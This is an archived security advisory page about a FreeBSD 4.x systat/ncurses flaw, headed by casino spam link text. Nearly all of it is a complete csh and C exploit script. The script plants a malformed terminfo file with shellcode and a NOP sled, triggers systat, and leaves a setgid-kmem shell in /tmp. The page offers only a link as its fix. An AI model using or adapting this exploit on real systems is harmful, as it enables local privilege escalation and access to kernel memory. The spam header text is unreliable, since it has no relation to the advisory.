Casinos Not On GamstopNon Gamstop CasinosCasinos Not On GamstopOnline Casinos UKNon Gamstop Casino
10th Oct 2000 [SBWID-214]
COMMAND
	    systat
SYSTEMS AFFECTED
	    FreeBSD 4.x
PROBLEM
	    Przemyslaw Frasunek posted following:
	
	    #!/bin/csh
	    # (c) 2000 Przemys�aw Frasunek <[email protected]>
	    #
	    # FreeBSD 4.x systat gid=kmem exploit
	    # Idea by: Jouko Pynn�nen <[email protected]>
	    #
	    # Dedicated to ksm.
	    cat << __EOF__ > /tmp/xx
	    #!/bin/csh
	    cp /bin/csh /tmp
	    chgrp kmem /tmp/csh
	    chmod 2755 /tmp/csh
	    __EOF__
	    chmod 755 /tmp/xx
	    cat << __EOF__ > /tmp/sploitte.c
	    #include <stdio.h>
	    #include <string.h>
	    #include <fcntl.h>
	    #define OFF -400
	    #define ALIGN 516
	    long getesp(void)
	    {
		    __asm__("movl %esp, %eax\n");
	    }
	    int main(void)
	    {
		    char execshell[] =
		    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
		    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
		    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01"
		    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
		    /* precompiled terminfo binary header */
		    char evilcap[] =
		    "\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02\x73\x63\x72\x65"
		    "\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\x49\x20\x58"
		    "\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x65\x72"
		    "\x6d\x69\x6e\x61\x6c";
		    char retbuf[5];
		    long ret = getesp() + OFF;
		    int i;
		    /* malicious terminfo binary */
		    write(2, evilcap, sizeof(evilcap)-1);
		    for (i=0;i<39;i++) write(2, "\0", 1);
		    for (i=0;i<86;i++) write(2, "\xff", 1);
		    write(2, "\0\0", 2);
		    for (i=0;i<750;i++) write(2, "\xff", 1);
		    for (i=0;i<ALIGN;i++) write(2, "a", 1);
		    sprintf(retbuf, "%c%c%c%c", ((int)ret & 0xff),
			    (((int)ret & 0xff00) >> 8),
			    (((int)ret & 0xff0000) >> 16),
			    (((int)ret & 0xff000000) >> 24));
		    write(2, retbuf, 5);
	    }
	    __EOF__
	    # malformed terminfo binary.
	    cc -o /tmp/s /tmp/sploitte.c
	    cd $HOME
	    mkdir -p .terminfo/s
	    /tmp/s >& .terminfo/s/screen
	    setenv TERM screen
	    # plenty of nops - usually adjusting offset isn't needed.
	    setenv EGG `perl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01\x02\x02\x02\
	    x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`
	    # boom.
	    /usr/bin/systat >& /dev/null
	    # cleaning up.
	    rm -f .terminfo/s/screen
	    ls -la /tmp/csh
	
	    As this  is bug  connected to  ncurses, I  suggest to examine it's
	    advisory (see URL below).
SOLUTION
	    http://oliver.efri.hr/~crv/security/bugs/ncurses3.html

Internet highlights